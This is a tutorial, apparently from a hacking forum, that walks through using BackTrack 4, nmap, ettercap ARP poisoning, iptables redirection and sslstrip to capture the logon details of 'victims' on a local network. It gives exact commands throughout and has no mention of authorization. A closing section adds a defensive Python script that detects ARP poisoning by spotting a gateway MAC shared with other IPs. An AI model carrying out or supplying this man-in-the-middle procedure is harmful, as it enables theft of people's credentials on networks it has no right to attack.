Requirements
Backtrack 4
Some knowledge of Linux
Access to a network
Victims
Software Being Used
ettercap
nmap
sslstrip
nano
ping
route
iptables
ifconfig
The First Step - Starting Backtrack 4
Start up Backtrack 4 on your PC. It will start out in a terminal, so issue the command startx to get to a desktop environment.
The Second Step - Starting Your Network Interface
You will need to click the bottom-left icon, select Internet, then select Wicd Network Manager. For this presentation I will be using my eth0 interface; you can substitute another interface such as wlan0 if you are connecting to a wireless network.
The Third Step - Finding out the subnet
First you will need to open the terminal; it is the icon next to the Firefox icon on the bar at the bottom of the screen. Next you need to find out the subnet and your default gateway address. You can do this by issuing the route command in the terminal. It will print a list of routes; you want the bottom-most entry in the column that says Gateway. Then you will need to issue the ping command to the gateway name or IP address. In the video it says tomato and it didn't ping, but its IP is 192.168.1.1.
The Fourth Step - Finding Victims to Sniff
We will now issue the command nmap -sP [default gateway ip]/24; this will scan all the IP addresses in that subnet. Make sure to enter the default gateway's IP address, not the literal text [default gateway ip], in the command. Once you have found a victim, remember that IP address; we will be using it in a later command.
The Fifth Step - Editing A File and Setting iptables
You will need to edit a file called etter.conf in the etc directory. So in the terminal issue the command nano /etc/etter.conf. You will need to find the lines containing:
Code:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
You will need to delete the two "#" characters at the start of the redir_command lines to make it look like this.
Code:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Once you have finished that, hold Ctrl and press X, then press Y, and then Enter. This will save the file. Next you will need to set up iptables. Just type or copy and paste this command into the terminal and press Enter.
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Then you will need to issue another command.
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Once you have completed that you are done configuring and ready to start sniffing.
The Sixth Step - Sniffing Logon Details
You will first need to open another terminal and in that terminal issue the command sslstrip -a -k -f. Then return to the other terminal that is open and issue the command to start sniffing. Make sure to substitute your interface if you are using something other than eth0. In this command the first IP address you enter is the default gateway's IP address. The second address you enter is the IP address of the victim.
Code:
ettercap -T -i eth0 -q -M arp:remote /192.168.1.1/ /192.168.1.33/
Do not forget to use the sslstrip command.
That's all ...
Once you have entered that command, you will need to wait until the victim has logged on to a site; once they have, the logon details will appear in the terminal.
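Seen from the victim's machine, the arp:remote poisoning in the sixth step leaves the gateway's IP address mapped to the sniffing host's MAC address, so one MAC ends up claimed by two IPs. The following is an added example, not part of the original tutorial, that parses `ip neigh show` output and flags that condition; the sample table, the MAC addresses and the function names are constructed for illustration.

```python
import re

# Constructed `ip neigh show` sample: gateway .1 and host .50 share one MAC.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 02:00:00:aa:bb:cc REACHABLE
192.168.1.50 dev eth0 lladdr 02:00:00:aa:bb:cc STALE
192.168.1.20 dev eth0 lladdr 02:00:00:11:3a:b7 REACHABLE
192.168.1.77 dev eth0  FAILED
"""

LINE_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
                     r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b", re.I)


def parse_neigh(text):
    """Return {ip: mac} for IPv4 entries that have a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries carry no lladdr and are skipped
            table[m.group(1)] = m.group(2).lower()
    return table


def shared_macs(table):
    """Return {mac: sorted ips} for every MAC claimed by more than one IP."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def check_gateway(table, gateway_ip, known_good_mac=None):
    """Return a list of findings about the gateway's ARP entry."""
    mac = table.get(gateway_ip)
    if mac is None:
        return [f"no ARP entry for gateway {gateway_ip}"]
    findings = []
    if known_good_mac and mac != known_good_mac.lower():
        findings.append(f"gateway {gateway_ip} is at {mac}, expected {known_good_mac.lower()}")
    others = [ip for ip in shared_macs(table).get(mac, []) if ip != gateway_ip]
    if others:
        findings.append(f"gateway MAC {mac} is also claimed by {', '.join(others)}")
    return findings


if __name__ == "__main__":
    for finding in check_gateway(parse_neigh(SAMPLE_NEIGH), "192.168.1.1", "02:00:00:00:00:01"):
        print("ALERT:", finding)
```

A shared MAC can also be legitimate (a multi-homed host or proxy ARP), so the comparison against a recorded known-good gateway MAC is the stronger of the two signals.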